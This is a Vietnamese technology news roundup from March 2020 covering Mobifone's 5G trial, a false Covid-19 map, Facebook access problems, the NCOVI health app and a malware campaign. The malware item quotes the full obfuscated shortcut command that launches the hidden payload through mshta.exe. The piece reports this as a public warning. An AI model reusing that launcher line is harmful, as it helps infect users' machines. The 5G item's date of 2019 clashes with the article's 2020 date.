Công nghệ tuần qua: Mobifone thử nghiệm 5G thành công, vì sao truy cập Facebook gặp khó?

Tuệ Lâm - 14/03/2020 07:16 (GMT+7)

(VNF) - Mobifone tuyên bố đã sẵn sàng triển khai mạng 5G; Viettel và VNPT lên tiếng khi người dùng Internet truy cập vào Facebook khó khăn, xuất hiện mã độc mạo danh chỉ thị của Thủ tướng về dịch Covid-19... là những tin tức công nghệ đáng chú ý trong tuần qua.

VNF
Người dùng Internet gặp khó khi truy cập vào Facebook trong thời gian vừa qua.

Thử nghiệm thành công, Mobifone tuyên bố đã sẵn sàng triển khai mạng 5G

Ngày 10/3/2019, Tổng công ty Viễn thông Mobifone công bố thử nghiệm thành công mạng 5G tại TP. HCM và các địa điểm đã được cấp phép theo giấy phép của Bộ Thông tin và Truyền thông. Với sự kiện này, Mobifone đã sẵn sàng cho việc triển khai mạng 5G cùng các ứng dụng dịch vụ đến khách hàng.

Thực hiện nội dung cấp phép thử nghiệm của Bộ Thông tin và Truyền thông, Mobifone đã triển khai thử nghiệm mạng 5G tại Hà Nội và một số thành phố lớn của cả nước như Đà Nẵng, Hải Phòng và TP. HCM.

Đại diện Mobifone cho biết trong quá trình thử nghiệm, công ty đã làm việc với các nhà cung cấp thiết bị, dịch vụ 5G lớn trên thế giới nhằm đánh giá toàn diện khả năng đáp ứng, chất lượng dịch vụ cũng như các vấn đề phát sinh khi triển khai mạng 5G trên diện rộng.

Kết quả thử nghiệm mạng 5G Mobifone thu được rất khả quan với trải nghiệm của người dùng, tốc độ dữ liệu tải xuống đạt xấp xỉ 2Gbps.

Trên nền tảng 5G, những dịch vụ ứng dụng dữ liệu tốc độ siêu cao như Hologram - thực hiện cuộc gọi 3D qua mạng 5G, các trò chơi trực tuyến sử dụng băng thông siêu tốc độ như Cloud Gaming, ứng dụng tương tác thực tế ảo (AR, VR) giữa 2 người ở 2 vị trí khác nhau như thi đấu bóng bàn, bóng đá từ xa… đã được Mobifone thử nghiệm thành công với độ trễ siêu thấp (gần bằng 0), cho cảm nhận sinh động và trực tiếp như ngoài đời thực.

Đến nay, quá trình thử nghiệm đã hoàn tất và hệ thống mạng của Mobifone đã sẵn sàng, đảm bảo tương thích về mặt công nghệ cho mạng 5G khi kết nối có thể hoạt động thông suốt, hiệu quả. (Xem thêm)

Công an khẳng định bản đồ dịch Covid-19 tại Hà Nội là không chính xác

Ngày 10/3, Công an Hà Nội yêu cầu lực lượng phòng chống tội phạm công nghệ cao phối hợp cùng công an các quận, huyện khẩn trương xác minh hành vi đăng tải thông tin sai về Covid-19, "khởi tố khi đủ điều kiện" để răn đe, phòng ngừa chung.

Cụ thể, ngay sau thông tin về "bệnh nhân thứ 17" nhiễm Covid-19, trên mạng xã hội lan truyền đường link Google Map chia sẻ bản đồ lưu ý dịch tại Hà Nội với hàng chục chấm đỏ cảnh báo. Thông tin này những ngày qua đã được nhiều người chia sẻ.

Về vấn đề này, Công an TP. Hà Nội khẳng định đây là bản đồ không chính xác, người dân không nên tin và chia sẻ bản đồ này.

Công an Hà Nội cũng khuyến cáo người dân nên truy cập các trang thông tin chính thống của cơ quan có thẩm quyền để nắm thông tin đúng nhất về Covid-19. (Xem thêm)

Viettel và VNPT nói gì khi người dùng Internet truy cập vào Facebook khó khăn?

Viettel và VNPT vừa phát đi thông báo về việc người dùng gặp khó khăn khi truy cập vào Facebook trong thời gian qua.

Theo đó, Viettel cho biết do kết nối gặp vấn đề nên khi khách hàng truy cập vào Facebook, chất lượng không ổn định tại một số thời điểm trong ngày. Còn VNPT thì cho biết do vấn đề kết nối của máy chủ quốc tế nên khách hàng gặp phải hiện tượng không ổn định khi sử dụng Facebook.

Cả 2 nhà mạng này cũng khẳng định đang tích cực phối hợp với các đơn vị liên quan để kiểm tra và khắc phục tình trạng này trong thời gian sớm nhất. Viettel và VNPT cũng bày tỏ mong muốn nhận được sự thông cảm từ phía khách hàng. (Xem thêm)

Xuất hiện mã độc mạo danh chỉ thị của Thủ tướng về dịch Covid-19

Thông tin từ Tập đoàn công nghệ CMC cho biết lợi dụng tình hình căng thẳng của dịch cúm Covid-19, mẫu mã độc giống với một số mẫu do nhóm tin tặc Panda phát triển được phát hiện đã thực hiện mạo danh 3 văn bản thông báo của chính phủ về tình hình dịch.

Cụ thể, mã độc được chèn trong một file word với tiêu đề: “Chi Thi cua thu tuong nguyen xuan phuc” nhằm đánh lừa người dùng. File mẫu là một file shortcut có phần mở rộng là “.lnk” được ẩn dưới dạng một file winword nhằm đánh lừa người dùng do đuôi “.lnk” sẽ được Windows ẩn đi.

Tuy nhiên, file winword này sử dụng một target đáng ngờ. Thông thường target của shorcut thường trỏ đến một thư mục hoặc file đích, nhưng target của mẫu này lại chứa đoạn command có dạng: “%comspec% /c for %x in (%temp%=%cd%) do for /f “delims==” %i in (‘dir “%x\Chi Thi cua thu tuong nguyen xuan phuc.lnk” /s /b’) do start m%windir:~-1,1%hta.exe “%i”.

Sau khi lừa người dùng tải về, qua hàng loạt lệnh, mã độc sẽ tiến hành tạo bản sao của 3 file thực thi vào thư mục profile của user hoặc alluserprofile nếu có đủ quyền administrator; thêm và khóa autorun để tự kích hoạt file thực thi vừa drop ra khi khởi động lại máy; tạo mutex, kết nối đến server (máy chủ) để nhận lệnh từ server; tạo backdoor (cửa hậu) cho phép kẻ tấn công thực thi lệnh từ xa; hay hỗ trợ nhiều lệnh thực thi khác nhau bao gồm upload file, thư mục, list folder, đọc file, lấy thông tin máy tính, thông tin người dùng… (Xem thêm)

Ra mắt ứng dụng khai báo sức khoẻ toàn dân NCOVI

Chiều 9/3, ứng dụng khai báo sức khoẻ toàn dân mang tên NCOVI đã chính thức ra mắt. Sau khi cài đặt ứng dụng trên smartphone, người dân cần nhập đầy đủ thông tin cá nhân theo yêu cầu để bắt đầu sử dụng.

Trên ứng dụng này, người dân sẽ cung cấp các thông tin cá nhân và tình hình sức khỏe của bản thân trong mục “khai báo y tế toàn dân” ở màn hình chính; cập nhật tình hình sức khoẻ hàng ngày ở màn hình “theo dõi sức khỏe”.

Ngoài ra, ứng dụng này còn có mục để người dân phản ánh về những trường hợp nghi nhiễm Covid-19 tại nơi mình sinh sống. Các dữ liệu này được cập nhật trên thời gian thực và được định vị trên nền tảng bản đồ số Việt Nam (Vmap).

Với những người không sử dụng điện thoại hay máy tính, các thành viên khác trong gia đình có thể hỗ trợ khai báo y tế, sức khoẻ. Việc khai báo sớm, trung thực sẽ giúp cơ quan chức năng cách ly, khoanh vùng ổ dịch kịp thời, tránh lây lan. (Xem thêm)

Cùng chuyên mục
Tin khác